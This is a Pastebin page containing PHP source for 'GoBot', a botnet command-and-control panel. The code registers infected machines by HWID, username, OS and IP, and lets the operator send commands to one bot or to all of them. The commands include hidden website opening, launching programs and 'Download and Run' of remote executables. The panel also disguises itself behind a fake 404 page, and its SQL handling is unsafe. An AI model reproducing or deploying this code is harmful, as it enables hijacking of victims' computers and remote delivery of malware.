API tools faq
paste
FlyFar

GoBot.php

FlyFar
Jul 15th, 2023
178
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 9.05 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. <?php
  2. $PanelPassword = "key"; //Letters and Numbers Only
  3.  
  4. $SQLName     = "localhost";
  5. $SQLUser     = "root";
  6. $SQLPassword = "";
  7. $SQLDatabase = "gobots";
  8.  
  9.  
  10. $conn = new mysqli($SQLName, $SQLUser, $SQLPassword, $SQLDatabase);
  11. if ($conn->connect_error) {
  12.     die("Connection failed: " . $conn->connect_error);
  13. }
  14.  
  15. ?>
  16.  
  17. <?php
  18. if (isset($_REQUEST["get"])):
  19.     $tmpdat = mysql_real_escape_string($_REQUEST["get"]);
  20.     $sql    = "SELECT Command FROM bots WHERE HWID='$tmpdat'";
  21.     $result = $conn->query($sql);
  22.     if ($result->num_rows > 0) {
  23.         while ($row = $result->fetch_assoc()) {
  24.             echo $row["Command"];
  25.         }
  26.     } else {
  27.         echo "Bot does not exist.";
  28.     }
  29. ?>
  30. <?php
  31. elseif (isset($_REQUEST["cmd"]) && $_REQUEST["cmd"] == $PanelPassword):
  32.     $per_page = 10;
  33.     if ($result = $conn->query("SELECT * FROM bots ORDER BY id")) {
  34.         if ($result->num_rows != 0) {
  35.             $total_results = $result->num_rows;
  36.             $total_pages   = ceil($total_results / $per_page);
  37.             if (isset($_GET['page']) && is_numeric($_GET['page'])) {
  38.                 $show_page = $_GET['page'];
  39.                 if ($show_page > 0 && $show_page <= $total_pages) {
  40.                     $start = ($show_page - 1) * $per_page;
  41.                     $end   = $start + $per_page;
  42.                 } else {
  43.                     $start = 0;
  44.                     $end   = $per_page;
  45.                 }
  46.             } else {
  47.                 $start = 0;
  48.                 $end   = $per_page;
  49.             }
  50.             echo "<center><h1>GoBot Control Panel</h1><br/>";
  51.             echo "<table border='1' cellpadding='10'>";
  52.             echo "<tr><th>HWID</th> <th>Username</th> <th>Windows</th> <th>IP</th> <th>Options</th></tr>";
  53.             for ($i = $start; $i < $end; $i++) {
  54.                 if ($i == $total_results) {
  55.                     break;
  56.                 }
  57.                 $result->data_seek($i);
  58.                 $row = $result->fetch_row();
  59.                 echo "<tr>";
  60.                 echo '<td>' . $row[1] . '</td>';
  61.                 echo '<td>' . $row[2] . '</td>';
  62.                 echo '<td>' . $row[3] . '</td>';
  63.                 echo '<td>' . $row[4] . '</td>';
  64.                 echo "<td><a href='$_SERVER[REQUEST_URI]&command=$row[1]'>Command</a> | <a href='$_SERVER[REQUEST_URI]&delete=$row[1]'>Delete</a></td>";
  65.                 echo "</tr>";
  66.             }
  67.             echo "</table>";
  68.             echo "<center><p><b>View Page:</b> ";
  69.             for ($i = 1; $i <= $total_pages; $i++) {
  70.                 if (isset($_GET['page']) && $_GET['page'] == $i) {
  71.                     echo $i . " ";
  72.                 } else {
  73.                     echo "<a href='$_SERVER[REQUEST_URI]&page=$i'>$i</a> ";
  74.                 }
  75.             }
  76.             echo "</p>";
  77.             echo "<form method=\"post\" action=\"http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]\">\n";
  78.             echo "<input type=\"text\" name=\"command\"><br>\n";
  79.             echo "   <input type=\"hidden\" name=\"hwid\" value=\"ALL\" /><br>\n";
  80.             echo "<input type=\"submit\" name=\"submitall\" value=\"Send Command to All\"><br>\n";
  81.             echo "</form></center>\n";
  82.         } else {
  83.             echo "<center>No results to display!</center>";
  84.         }
  85.     } else {
  86.         echo "Error: " . $mysqli->error;
  87.     }
  88.     if (isset($_POST['submit'])) //Single Bot
  89.         {
  90.         $raw_tmp = mysql_real_escape_string($_REQUEST["command"]);
  91.         $raw_tmp2 = mysql_real_escape_string($_REQUEST["hwid"]);
  92.         $enc_tmp = base64_encode($raw_tmp2."|".$raw_tmp);
  93.        
  94.         if ($stmt = $conn->prepare("UPDATE bots SET command='$enc_tmp' WHERE HWID = ? LIMIT 1")) {
  95.             $stmt->bind_param("s", $raw_tmp2);
  96.             $stmt->execute();
  97.             $stmt->close();
  98.             echo "<strong>Command: </strong><i>" . $raw_tmp . " </i><strong>Sent!</strong><br/>";
  99.             $url = strtok($_SERVER["REQUEST_URI"], '?');
  100.             $key = $_REQUEST["cmd"];
  101.             echo "<strong>Refresh Page: </strong> <a href='$url?cmd=$key'>HERE</a>";
  102.         } else {
  103.             echo "ERROR: could not prepare SQL statement.";
  104.         }
  105.     } elseif (isset($_POST['submitall'])) //All Bots
  106.         {
  107.         $raw_tmp = mysql_real_escape_string($_REQUEST["command"]);
  108.         $raw_tmp2 = mysql_real_escape_string($_REQUEST["hwid"]);
  109.         $enc_tmp = base64_encode($raw_tmp2."|".$raw_tmp);    
  110.         if ($stmt = $conn->prepare("UPDATE bots SET command='$enc_tmp'")) {;
  111.             $stmt->execute();
  112.             $stmt->close();
  113.             echo "<strong>Command: </strong><i>" . $raw_tmp . " </i><strong>Sent!</strong><br/>";
  114.             $url = strtok($_SERVER["REQUEST_URI"], '?');
  115.             $key = $_REQUEST["cmd"];
  116.             echo "<strong>Refresh Page: </strong> <a href='$url?cmd=$key'>HERE</a>";
  117.         } else {
  118.             echo "ERROR: could not prepare SQL statement.";
  119.         }
  120.     } elseif (isset($_REQUEST["command"])) {
  121.         $tmpid = $_REQUEST["command"];
  122.         echo "<strong>Target:</strong> <i>$tmpid</i>";
  123.         echo "<form method=\"post\" action=\"http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]\">\n";
  124.         echo "   <input type=\"text\" name=\"command\"><br>\n";
  125.         echo "   <input type=\"hidden\" name=\"hwid\" value=\"$tmpid\" /><br>\n";
  126.         echo "   <input type=\"submit\" name=\"submit\" value=\"Send Command to $tmpid\"><br>\n";
  127.         echo "</form>\n";
  128.        
  129.     } elseif (isset($_REQUEST["delete"])) {
  130.         $id = $_REQUEST["delete"];
  131.         if ($stmt = $conn->prepare("DELETE FROM bots WHERE HWID = ? LIMIT 1")) {
  132.             $stmt->bind_param("s", $id);
  133.             $stmt->execute();
  134.             $stmt->close();
  135.         } else {
  136.             echo "ERROR: could not prepare SQL statement.";
  137.         }
  138.         echo "<strong>Bot deleted!</strong><br/>";
  139.         $url = strtok($_SERVER["REQUEST_URI"], '?');
  140.         $key = $_REQUEST["cmd"];
  141.         echo "<strong>Refresh Page: </strong> <a href='$url?cmd=$key'>HERE</a>";
  142.     }
  143. ?>
  144. <center><table width="50%" border="1">
  145.   <caption>
  146.     <h2>GoBot Commands</h2>
  147.   </caption>
  148.   <tbody>
  149.     <tr>
  150.       <th scope="col">Name</th>
  151.       <th scope="col">Command</th>
  152.       <th scope="col">Example</th>
  153.     </tr>
  154.     <tr>
  155.       <td><center>Open Website Visable</center></td>
  156.       <td><center>1|{URL}|V</center></td>
  157.       <td><center>1|www.google.com|V</center></td>
  158.     </tr>
  159.     <tr>
  160.       <td><center>
  161.       Open Website Hidden
  162.       </center></td>
  163.       <td><center>
  164.       1|{URL}|H
  165.       </center></td>
  166.       <td><center>
  167.         1|www.google.com|H
  168.       </center></td>
  169.     </tr>
  170.     <tr>
  171.       <td><center>
  172.       Show Message Box
  173.       </center></td>
  174.       <td><center>
  175.       2|{TITLE}|{MESSAGE}
  176.       </center></td>
  177.       <td><center>
  178.       2|GoBot|Hello World!
  179.       </center></td>
  180.     </tr>
  181.     <tr>
  182.       <td><center>
  183.       Kill GoBot
  184.       </center></td>
  185.       <td><center>
  186.       0
  187.       </center></td>
  188.       <td><center>
  189.       0
  190.       </center></td>
  191.     </tr>
  192.        <tr>
  193.       <td><center>Start Program</center></td>
  194.       <td><center>3|{PROGRAMNAME}.exe</center></td>
  195.       <td><center>3|calc.exe</center></td>
  196.     </tr>
  197.         <tr>
  198.       <td><center>Download and Run</center></td>
  199.       <td><center>4|{URLTOEXE}</center></td>
  200.       <td><center>4|http://filehost.com/file.exe</center></td>
  201.     </tr>
  202.       <tr>
  203.       <td>&nbsp;</td>
  204.       <td>&nbsp;</td>
  205.       <td>&nbsp;</td>
  206.     </tr>
  207.   </tbody>
  208. </table>
  209.   <h2>How to use</h2>
  210. <br/>
  211. Once a bot is running it will connect to the Control panel, it will send its information and then wait for orders.
  212. <br/>
  213. To command a single bot, find it on the list and select "Command". This will bring up a new command box with the bots HWID aready in, just enter your command like you see it on the command list.
  214. <br/>
  215. To command all bots just enter the command in the "Send Command to All" field.
  216. <br/>
  217. <br/>
  218. <strong>Project Github:</strong> <a href="https://github.com/SaturnsVoid/GoBot/" target="new">Github.com</a>
  219. </center>
  220. <?php
  221. elseif (isset($_REQUEST["INFO"]) || isset($_REQUEST["HWID"]) || isset($_REQUEST["USERNAME"]) || isset($_REQUEST["WINDOWS"])):
  222.     $tmpdatA = mysql_real_escape_string($_REQUEST["HWID"]);
  223.     $tmpdatB = mysql_real_escape_string($_REQUEST["USERNAME"]);
  224.     $tmpdatC = mysql_real_escape_string($_REQUEST["WINDOWS"]);
  225.     $tmpdatD = mysql_real_escape_string($_SERVER['REMOTE_ADDR']);
  226.     $query   = mysqli_query($conn, "SELECT Command FROM bots WHERE HWID='$tmpdatA'");
  227.     if (mysqli_num_rows($query) > 0) {
  228.        
  229.         echo "Already Exists";
  230.     } else {
  231.         $sql = "INSERT INTO bots (HWID, Username, Windows, IP) VALUES ('$tmpdatA', '$tmpdatB', '$tmpdatC', '$tmpdatD')";
  232.         if ($conn->query($sql) === TRUE) {
  233.             echo "New record created successfully";
  234.         } else {
  235.             echo "Error: " . $sql . "<br>" . $conn->error;
  236.         }
  237.     }
  238. ?>
  239.  
  240. <?php
  241. else:
  242. ?>
  243.    <!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">
  244.     <HTML><HEAD>
  245.     <TITLE>404 Not Found</TITLE>
  246.     </HEAD><BODY>
  247.     <H1>Not Found</H1>
  248.     The requested URL was not found on this server.
  249.     </BODY></HTML>
  250. <?php
  251. endif;
  252. ?>
Tags: php botnet
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!